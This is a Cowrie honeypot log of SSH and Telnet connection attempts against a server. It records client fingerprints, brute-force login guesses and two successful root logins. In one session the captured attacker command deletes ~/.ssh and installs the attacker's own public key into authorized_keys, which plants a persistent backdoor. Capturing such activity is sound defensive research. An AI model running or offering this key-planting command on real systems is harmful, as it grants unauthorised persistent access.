{"eventid":"cowrie.session.closed","duration":12.829257488250732,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:51.135980Z","src_ip":"122.97.209.175","session":"af2d696254ff"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":10058,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b0541d20260","protocol":"telnet","message":"New connection: 122.97.209.175:10058 (1.2.3.4:23) [session: 2b0541d20260]","sensor":"my-vps","timestamp":"2025-09-09T05:00:51.337862Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":48758,"dst_ip":"1.2.3.4","dst_port":22,"session":"42f8f2b943b8","protocol":"ssh","message":"New connection: 102.68.86.62:48758 (1.2.3.4:22) [session: 42f8f2b943b8]","sensor":"my-vps","timestamp":"2025-09-09T05:00:52.882907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:00:52.883698Z","src_ip":"102.68.86.62","session":"42f8f2b943b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:00:53.270823Z","src_ip":"102.68.86.62","session":"42f8f2b943b8"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"password","message":"login attempt [muhammad/password] failed","sensor":"my-vps","timestamp":"2025-09-09T05:00:54.807052Z","src_ip":"102.68.86.62","session":"42f8f2b943b8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:56.075584Z","src_ip":"102.68.86.62","session":"42f8f2b943b8"}
{"eventid":"cowrie.session.closed","duration":12.771795988082886,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:04.109581Z","src_ip":"122.97.209.175","session":"2b0541d20260"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":51335,"dst_ip":"1.2.3.4","dst_port":23,"session":"28a8dbd14438","protocol":"telnet","message":"New connection: 122.194.9.203:51335 (1.2.3.4:23) [session: 28a8dbd14438]","sensor":"my-vps","timestamp":"2025-09-09T05:01:04.321169Z"}
{"eventid":"cowrie.session.connect","src_ip":"124.156.203.226","src_port":46614,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6f0cdf04be4","protocol":"ssh","message":"New connection: 124.156.203.226:46614 (1.2.3.4:22) [session: b6f0cdf04be4]","sensor":"my-vps","timestamp":"2025-09-09T05:01:16.823376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:01:16.824541Z","src_ip":"124.156.203.226","session":"b6f0cdf04be4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T05:01:16.987683Z","src_ip":"124.156.203.226","session":"b6f0cdf04be4"}
{"eventid":"cowrie.session.closed","duration":12.7927565574646,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:17.113803Z","src_ip":"122.194.9.203","session":"28a8dbd14438"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":28611,"dst_ip":"1.2.3.4","dst_port":23,"session":"23988b202b3d","protocol":"telnet","message":"New connection: 122.97.209.175:28611 (1.2.3.4:23) [session: 23988b202b3d]","sensor":"my-vps","timestamp":"2025-09-09T05:01:17.273676Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:24.824003Z","src_ip":"124.156.203.226","session":"b6f0cdf04be4"}
{"eventid":"cowrie.session.closed","duration":12.851183652877808,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:30.124786Z","src_ip":"122.97.209.175","session":"23988b202b3d"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":32895,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3c236faca60","protocol":"telnet","message":"New connection: 122.194.9.203:32895 (1.2.3.4:23) [session: d3c236faca60]","sensor":"my-vps","timestamp":"2025-09-09T05:01:30.319767Z"}
{"eventid":"cowrie.session.closed","duration":12.753389835357666,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:43.073067Z","src_ip":"122.194.9.203","session":"d3c236faca60"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":9888,"dst_ip":"1.2.3.4","dst_port":23,"session":"2aa59c60de0a","protocol":"telnet","message":"New connection: 122.97.209.175:9888 (1.2.3.4:23) [session: 2aa59c60de0a]","sensor":"my-vps","timestamp":"2025-09-09T05:01:43.377888Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37746,"dst_ip":"1.2.3.4","dst_port":22,"session":"504bf877d14e","protocol":"ssh","message":"New connection: 212.227.235.229:37746 (1.2.3.4:22) [session: 504bf877d14e]","sensor":"my-vps","timestamp":"2025-09-09T05:01:50.852623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:01:50.853699Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:01:51.087122Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.login.success","username":"root","password":"abhaile1","message":"login attempt [root/abhaile1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:01:52.064305Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:01:52.585289Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:01:52.585957Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:01:52.586803Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:52.820769Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:01:53.348972Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:01:53.349652Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:01:53.585985Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:53.586895Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38408,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f0d8294cf19","protocol":"ssh","message":"New connection: 212.227.235.229:38408 (1.2.3.4:22) [session: 5f0d8294cf19]","sensor":"my-vps","timestamp":"2025-09-09T05:01:53.825456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:01:53.826143Z","src_ip":"212.227.235.229","session":"5f0d8294cf19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:01:54.065481Z","src_ip":"212.227.235.229","session":"5f0d8294cf19"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:01:55.060405Z","src_ip":"212.227.235.229","session":"5f0d8294cf19"}
{"eventid":"cowrie.session.closed","duration":12.79958438873291,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.177407Z","src_ip":"122.97.209.175","session":"2aa59c60de0a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.301630Z","src_ip":"212.227.235.229","session":"5f0d8294cf19"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":28941,"dst_ip":"1.2.3.4","dst_port":23,"session":"393a16fe9499","protocol":"telnet","message":"New connection: 122.97.209.175:28941 (1.2.3.4:23) [session: 393a16fe9499]","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.375508Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39016,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a2ee4a62df1","protocol":"ssh","message":"New connection: 212.227.235.229:39016 (1.2.3.4:22) [session: 6a2ee4a62df1]","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.539601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.540442Z","src_ip":"212.227.235.229","session":"6a2ee4a62df1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:01:56.781596Z","src_ip":"212.227.235.229","session":"6a2ee4a62df1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:01:57.780811Z","src_ip":"212.227.235.229","session":"6a2ee4a62df1"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:58.019900Z","src_ip":"212.227.235.229","session":"504bf877d14e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:01:58.021436Z","src_ip":"212.227.235.229","session":"6a2ee4a62df1"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:02:00.209375Z","src_ip":"14.103.112.104","session":"4f4db09677ae"}
{"eventid":"cowrie.session.closed","duration":12.719892740249634,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:02:09.095327Z","src_ip":"122.97.209.175","session":"393a16fe9499"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":6382,"dst_ip":"1.2.3.4","dst_port":23,"session":"fbcefdb80137","protocol":"telnet","message":"New connection: 122.97.209.175:6382 (1.2.3.4:23) [session: fbcefdb80137]","sensor":"my-vps","timestamp":"2025-09-09T05:02:09.301669Z"}
{"eventid":"cowrie.session.closed","duration":12.772975206375122,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:02:22.074579Z","src_ip":"122.97.209.175","session":"fbcefdb80137"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39381,"dst_ip":"1.2.3.4","dst_port":23,"session":"f5cee4fe6f8e","protocol":"telnet","message":"New connection: 60.19.222.5:39381 (1.2.3.4:23) [session: f5cee4fe6f8e]","sensor":"my-vps","timestamp":"2025-09-09T05:02:49.770439Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39378,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7110f3b9932","protocol":"telnet","message":"New connection: 60.19.222.5:39378 (1.2.3.4:23) [session: a7110f3b9932]","sensor":"my-vps","timestamp":"2025-09-09T05:02:51.749705Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39390,"dst_ip":"1.2.3.4","dst_port":23,"session":"89c746ce99a9","protocol":"telnet","message":"New connection: 60.19.222.5:39390 (1.2.3.4:23) [session: 89c746ce99a9]","sensor":"my-vps","timestamp":"2025-09-09T05:02:51.798903Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39517,"dst_ip":"1.2.3.4","dst_port":23,"session":"0bcf9bd4fca7","protocol":"telnet","message":"New connection: 60.19.222.5:39517 (1.2.3.4:23) [session: 0bcf9bd4fca7]","sensor":"my-vps","timestamp":"2025-09-09T05:02:56.014170Z"}
{"eventid":"cowrie.session.closed","duration":12.771068572998047,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:02.541444Z","src_ip":"60.19.222.5","session":"f5cee4fe6f8e"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39534,"dst_ip":"1.2.3.4","dst_port":23,"session":"90a5778c2fa0","protocol":"telnet","message":"New connection: 60.19.222.5:39534 (1.2.3.4:23) [session: 90a5778c2fa0]","sensor":"my-vps","timestamp":"2025-09-09T05:03:02.709450Z"}
{"eventid":"cowrie.session.closed","duration":12.694047927856445,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:04.443687Z","src_ip":"60.19.222.5","session":"a7110f3b9932"}
{"eventid":"cowrie.session.closed","duration":12.702221155166626,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:04.501060Z","src_ip":"60.19.222.5","session":"89c746ce99a9"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39598,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4c7be19e3c2","protocol":"telnet","message":"New connection: 60.19.222.5:39598 (1.2.3.4:23) [session: d4c7be19e3c2]","sensor":"my-vps","timestamp":"2025-09-09T05:03:04.645842Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39600,"dst_ip":"1.2.3.4","dst_port":23,"session":"baffc81a4afb","protocol":"telnet","message":"New connection: 60.19.222.5:39600 (1.2.3.4:23) [session: baffc81a4afb]","sensor":"my-vps","timestamp":"2025-09-09T05:03:04.664845Z"}
{"eventid":"cowrie.session.closed","duration":12.512714624404907,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:08.526819Z","src_ip":"60.19.222.5","session":"0bcf9bd4fca7"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39666,"dst_ip":"1.2.3.4","dst_port":23,"session":"311caf47055a","protocol":"telnet","message":"New connection: 60.19.222.5:39666 (1.2.3.4:23) [session: 311caf47055a]","sensor":"my-vps","timestamp":"2025-09-09T05:03:08.729434Z"}
{"eventid":"cowrie.session.closed","duration":12.754652261734009,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:15.464027Z","src_ip":"60.19.222.5","session":"90a5778c2fa0"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39783,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b53ff2bd6de","protocol":"telnet","message":"New connection: 60.19.222.5:39783 (1.2.3.4:23) [session: 7b53ff2bd6de]","sensor":"my-vps","timestamp":"2025-09-09T05:03:15.631367Z"}
{"eventid":"cowrie.session.closed","duration":12.772351264953613,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:17.437135Z","src_ip":"60.19.222.5","session":"baffc81a4afb"}
{"eventid":"cowrie.session.closed","duration":12.801689863204956,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:17.447459Z","src_ip":"60.19.222.5","session":"d4c7be19e3c2"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39808,"dst_ip":"1.2.3.4","dst_port":23,"session":"6277091dd92c","protocol":"telnet","message":"New connection: 60.19.222.5:39808 (1.2.3.4:23) [session: 6277091dd92c]","sensor":"my-vps","timestamp":"2025-09-09T05:03:17.618373Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39807,"dst_ip":"1.2.3.4","dst_port":23,"session":"16aad42b4ac2","protocol":"telnet","message":"New connection: 60.19.222.5:39807 (1.2.3.4:23) [session: 16aad42b4ac2]","sensor":"my-vps","timestamp":"2025-09-09T05:03:17.632052Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39811,"dst_ip":"1.2.3.4","dst_port":23,"session":"daf0a12d9ca7","protocol":"telnet","message":"New connection: 60.19.222.5:39811 (1.2.3.4:23) [session: daf0a12d9ca7]","sensor":"my-vps","timestamp":"2025-09-09T05:03:20.319543Z"}
{"eventid":"cowrie.session.closed","duration":12.759221076965332,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:21.488571Z","src_ip":"60.19.222.5","session":"311caf47055a"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39813,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7d5123eb069","protocol":"telnet","message":"New connection: 60.19.222.5:39813 (1.2.3.4:23) [session: d7d5123eb069]","sensor":"my-vps","timestamp":"2025-09-09T05:03:21.691785Z"}
{"eventid":"cowrie.session.closed","duration":12.943836212158203,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:28.575139Z","src_ip":"60.19.222.5","session":"7b53ff2bd6de"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39954,"dst_ip":"1.2.3.4","dst_port":23,"session":"713964e977c1","protocol":"telnet","message":"New connection: 60.19.222.5:39954 (1.2.3.4:23) [session: 713964e977c1]","sensor":"my-vps","timestamp":"2025-09-09T05:03:28.839802Z"}
